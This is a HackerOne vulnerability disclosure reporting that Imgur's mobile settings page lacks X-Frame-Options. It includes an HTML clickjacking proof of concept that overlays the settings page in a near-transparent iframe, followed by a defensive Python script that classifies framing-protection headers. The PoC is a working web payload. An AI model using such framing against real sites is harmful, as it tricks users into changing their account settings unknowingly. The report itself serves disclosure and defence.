Imgur: Attack User Privacy Settings - X-Frame-Options missing on m.imgur.com/user/username/settings

2015-12-03T08:43:34
ID H1:103178
Type hackerone
Reporter kasser
Modified 2016-05-04T04:13:46

Description

Hello, I would like to report that almost the entire mobile web site is vulnerable to clickjacking attacks. Maybe the most important critical part is the /settings node, as an attacker could force a user to change his privacy settings with only two clicks; please see the live video demonstration. Of course this is vulnerable under mobile browsers; also, the attached PoC can be tested under a desktop browser by changing the User-Agent header to a mobile browser (e.g. UCBrowser) using a User-Agent-Switcher Firefox/Chrome addon.

PoC: please replace "username" with your actual username to test this PoC successfully.

    <html>
    <head>
    <title>Clickjack test page</title>
    <style>
    iframe {
      width: 900px;
      height: 800px;
      /* Use absolute positioning to line up update button with fake button */
      position: absolute;
      top: 100px;
      left: 100px;
      z-index: 2;
      /* Hide from view */
      -moz-opacity: 0.2;
      opacity: 0.2;
      filter: alpha(opacity=0.2);
    }
    button {
      position: absolute;
      top: 330px;
      left: 100px;
      z-index: 1;
      width: 65px;
    }
    </style>
    </head>
    <body>
    <p>website is VULNERABLE to click jacking!</p>
    <iframe src="http://m.imgur.com/user/username/settings" height="700" width="1000"></iframe>
    </body>
    </html>
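As an added defensive check (not code from the report or from Imgur), the following classifies whether a response's headers still permit cross-origin framing, which is the condition behind this finding; the desktop and mobile header sets are constructed samples, not captured from imgur.com.

```python
"""Added example (not part of the report or of Imgur's code): classify a
response's framing protection from its headers, the condition the report
describes for m.imgur.com/user/<username>/settings on the mobile site."""
from typing import Mapping

# Constructed sample headers (not captured from imgur.com) for a desktop and a
# mobile response to the same settings page, mirroring the report's finding.
SAMPLE_RESPONSES = {
    "desktop": {"Content-Type": "text/html", "X-Frame-Options": "SAMEORIGIN"},
    "mobile": {"Content-Type": "text/html"},
}


def framing_protection(headers: Mapping[str, str]) -> str:
    """Return 'protected', 'ambiguous' or 'frameable' for one response.

    CSP frame-ancestors is checked first because browsers that support it
    ignore X-Frame-Options when both are present. Header names are matched
    case-insensitively; X-Frame-Options values are case-insensitive too.
    """
    lower = {k.lower(): v for k, v in headers.items()}

    csp = lower.get("content-security-policy", "")
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            sources = value.split()
            # An empty list or 'none' blocks all framing; 'self' or an explicit
            # origin allow-list blocks cross-origin framing unless it has '*'.
            return "frameable" if "*" in sources else "protected"

    xfo = lower.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "protected"
    if xfo:
        # ALLOW-FROM (never supported by Chrome/Safari) or an invalid value:
        # browsers ignore it, so treat it as a finding to review, not a pass.
        return "ambiguous"
    return "frameable"


def audit(responses: Mapping[str, Mapping[str, str]]) -> dict:
    """Map each labelled response to its framing classification."""
    return {label: framing_protection(h) for label, h in responses.items()}


if __name__ == "__main__":
    for label, verdict in audit(SAMPLE_RESPONSES).items():
        print(f"{label}: {verdict}")
```

Run it against headers captured with a mobile User-Agent as well as a desktop one, since the report shows the two variants of the site can differ.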